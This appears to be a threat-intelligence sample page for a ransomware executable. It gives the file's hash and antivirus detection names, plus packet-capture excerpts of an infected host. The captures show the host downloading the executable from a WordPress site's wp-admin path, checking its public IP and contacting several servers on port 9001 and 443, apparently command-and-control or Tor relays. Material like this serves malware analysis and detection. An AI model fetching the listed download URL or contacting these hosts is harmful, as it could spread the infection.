f915df4a50447.exe Trojan Malware Locky Ransomware Variant PCAP file download traffic sample 84.245.32.195.9001

SHA256: f1fd445efb4124577c1ca3b615b5bc7ee272b213e525d76ae3581961aaf93992
File name: f915df4a50447.exe
Detection ratio: 31 / 56
Analysis date: 2016-10-28 00:41:33 UTC ( 0 minutes ago )
AhnLab-V3 Trojan/Win32.Miuref.N2135633990 20161027
Arcabit Application.Generic.D373ABC 20161027
Avast Win32:Trojan-gen 20161027
Avira (no cloud) TR/Dropper.ctaah 20161027
BitDefender Application.GenericKD.3619516 20161027
Comodo TrojWare.NSIS.Injector.~GZ 20161027
Cyren W32/Trojan.FRWW-9040 20161028
DrWeb Trojan.DownLoader23.460 20161028
ESET-NOD32 NSIS/Injector.GZ 20161028
Fortinet W32/Injector.GX!tr 20161028
GData Application.GenericKD.3619516 20161027
K7AntiVirus Riskware ( 0040eff71 ) 20161025
K7GW Riskware ( 0040eff71 ) 20161027
Kaspersky Trojan-Ransom.Win32.Shade.kye 20161028
Malwarebytes Ransom.Locky 20161028
McAfee RDN/Ransom 20161028
McAfee-GW-Edition RDN/Ransom 20161028
eScan Application.GenericKD.3619516 20161028
Microsoft Ransom:Win32/Troldesh.A 20161027

2016-10-27 19:26:58.760888 IP 192.168.1.102.55714 > 192.185.89.155.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /wp-admin/f915df4a50447.exe HTTP/1.1
E..[s_@……..f..Y….Pv…..d.P…H#..GET /wp-admin/f915df4a50447.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: www.bodebarker.com
Connection: Keep-Alive

2016-10-27 19:26:58.867112 IP 192.168.1.102.55714 > 192.185.89.155.80: Flags [.], ack 4381, win 256, length 0
E..(s`@……..f..Y….Pv..”..u.P…T………

E..(a.@…X….fh_…..P…….’P………….
2016-10-27 19:27:40.906477 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET / HTTP/1.1
E…a.@…X%…fh_…..P…….’P…….GET / HTTP/1.1
Host: whatismyipaddress.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

2016-10-27 19:27:41.042168 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [.], ack 4381, win 256, length 0
E..(a.@…X….fh_…..P…….CP….T……..
2016-10-27 19:27:41.042617 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [.], ack 5841, win 256, length 0
E..(a.@…X….fh_…..P……..P………….
2016-10-27 19:27:41.043644 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [.], ack 10221, win 256, length 0

2016-10-27 19:28:17.872524 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 160930:161473, ack 653714, win 1123, length 543
E..Gr.@…N….fT. …#)..|.X..KP..c.P………z4..2..  /K1…. …1….K…B0..Nn…pQ../>u…D.I.>.]X@D….4F….D…..%x%8Q…..’………….l.2.`.l.C….`d$…t.dm..?.ql1.-F;m.Q.).Z…..o.n…..W…L…C….n.3….Rq..Q…S.P:GETCYAjV…y……n….I..m`.8.|..(.t.D…PC.1l.B….f.7…U.K$.7.J…..K.V.gAiOA.P…….|#.x7.\..sWgq!……K7F+……..n.z;(.’..|.oke.>.b….50.2.;…&h..[……-..No…%……h._……0..5..N..D.LL.C….e..
7…I.l.*..:..>..c….*…..0.D…9K..6…C.,;.4……p…Q.k….w…(.V0.n..KD]+..d9.].[..NZ….&.G    ..Z..;o…………’8Za:.q..!..gN.r.<V.D.
2016-10-27 19:28:18.259609 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 161473:162016, ack 654257, win 1121, length 543
E..Gr.@…N
…fT. …#)..~.X..jP..anN………z4..2…,lu….X…^…Yi.H..=hB.iv.h.@………….c…`…..vh..k….\h-.z..,y8$S..^….mKk…Qj]d.<.,0f..1…<….5…[n….#(………”.D.;..^….- ..0..]….7dhx.,.h.A.C….h…w.1|:…3./……u.x..Q…F..;mS..     .G…..D…$UJ..d-.Rw.e.%.z..c’…..8…..O4.f.T..[%
T..9″…/..!……
%.(A..v….}28…….%.M.}…w”…;..M…i9..   KLa.2u.6…..An…,w..$…NW.A……;’  ….](yzU.kfr…j.._…;8…=…F…..f…
P…Ky..D../7!-B:7M…..q?…pj.R….5m…K3… .hm..m].r.*..cY.nA..:
K..5.;.5….yM….k..j..M.(..o.?7…T.].’.y.9.A.

 

2016-10-27 19:27:26.629771 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [.], ack 4252768411, win 256, length 0
E..(b6@….&…f>…..#)7….|..P………….
2016-10-27 19:27:26.634948 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 0:203, ack 1, win 256, length 203
E…b7@….Z…f>…..#)7….|..P………………..d.}G../.G…T……….!..wY……+./.
.       …..3.9./.5……………www.ownenrs6s3ee5ro.com………
.4.2………….       .
……………………………..#……………………………
2016-10-27 19:27:26.645309 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [.], ack 1489431994, win 256, length 0
E..(qy@…Q….fT. …#)….X…P…MI……..
2016-10-27 19:27:26.650316 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 0:213, ack 1, win 256, length 213
E…qz@…P….fT. …#)….X…P………………….;.5CA..t.p+”.-|H.l…..Us…….+./.
.       …..3.9./.5………&.$..!www.ymjb2hdjgpwuwhglgdbu4e4z2.com………
.4.2………….       .
……………………………..#……………………………
2016-10-27 19:27:26.650888 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [.], ack 885415177, win 256, length 0
E..(..@…n….f.e.|…..gH.4.] P…{g……..
2016-10-27 19:27:26.665290 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [P.], seq 0:213, ack 1, win 256, length 213
E…..@…n….f.e.|…..gH.4.] P…O………………………..r…V.aeQ…`.p……+./.
.       …..3.9./.5………&.$..!www.nchssxvzzddce7uyfkpoelzal.com………
.4.2………….       .
……………………………..#……………………………
2016-10-27 19:27:26.746653 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 203:329, ack 750, win 253, length 126
E…b8@……..f>…..#)7….|..P………..F…BA.,`;e…/..C%…..b.OP
.|…..sC…..Hf…DC.QH..K..m…K~.$.hJ.5……….(.pP.J….`……..t…T..w*.F.f.n…….
2016-10-27 19:27:26.769845 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 213:339, ack 745, win 253, length 126
E…q{@…Q….fT. …#)….X…P…_…….F…BA.*..’4..3</..X….B…yO.h!;j~.!…!.R./…….,v…A.>..”… 4.B……….(..z4..1.`}’uoV./…………R.@..RS1..s|
2016-10-27 19:27:26.787920 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [P.], seq 213:339, ack 754, win 253, length 126
E…..@…n^…f.e.|…..gI.4._.P………..F…BA….5nw…]x’~…..U.>.z”.3X.+|H.~{….BA~.?……)=$d.$\…R-.3………..(………b-mt     (A.q.RTT.?…..O”..{…S..
2016-10-27 19:27:26.866549 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 329:367, ack 801, win 253, length 38
E..Nb9@……..f>…..#)7..G.|..P…W…….!.pP.J….. .F%T..7Yx4….7……[
2016-10-27 19:27:26.872561 IP 192.168.1.102.55717 > 84.245.32.195.9001: Flags [P.], seq 339:377, ack 796, win 253, length 38
E..Nq|@…Qg…fT. …#)..      4X…P….^……!..z4..1.R…q.Gw!x..].2…qC…..
2016-10-27 19:27:26.908008 IP 192.168.1.102.55716 > 46.101.141.124.443: Flags [P.], seq 339:377, ack 805, win 253, length 38
E..N..@…n….f.e.|…..gJ94.`-P….w……!……./…..2..\..S.A.D……YQ.
2016-10-27 19:27:26.971056 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [.], ack 2316, win 256, length 0
E..(b:@….”…f>…..#)7..m.|!.P………….
2016-10-27 19:27:26.972049 IP 192.168.1.102.55718 > 62.210.244.146.9001: Flags [P.], seq 367:910, ack 2316, win 256, length 543
E..Gb;@……..f>…..#)7..m.|!.P…V………pP.J…n.HW….]……….’…K…..zh…}MC…i……..c..1…A……br~…x.ZQ….^[….._.._..K……Wi>9:i..j., .i..s….rE^..>.*.4..|u ..7..h..n..>.>/1v……4.j_\b…..N^E…..f4z.S..Q.5..}1…..t..’ R.M8~….
…T.s.u)z1s.h…%..W….K|.F.L..`aD..;&….ZY…..6C…D…..m…..G….l..$……k..&.b…2.$X..qbi. P,%T…….-A…J..@%p..^X]..W.X…….k`_’..
X.3..e`E…..l.%n.0Qdi…wh.~..i..D~E…Q.n..:…n@..?.Q.s..m.”…x.0u.jc.      .!..    L:……f..e..B…)..j..
…XiK…Zk.`..nOh{.*x%2……..”]….lS…8..SMg=.U.~S.wt.7/..z/.y

 

2016-10-27 19:27:40.906477 IP 192.168.1.102.55719 > 104.95.22.177.80: Flags [P.], seq 0:139, ack 1, win 256, length 139: HTTP: GET / HTTP/1.1
E…a.@…X%…fh_…..P…….’P…….GET / HTTP/1.1
Host: whatismyipaddress.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0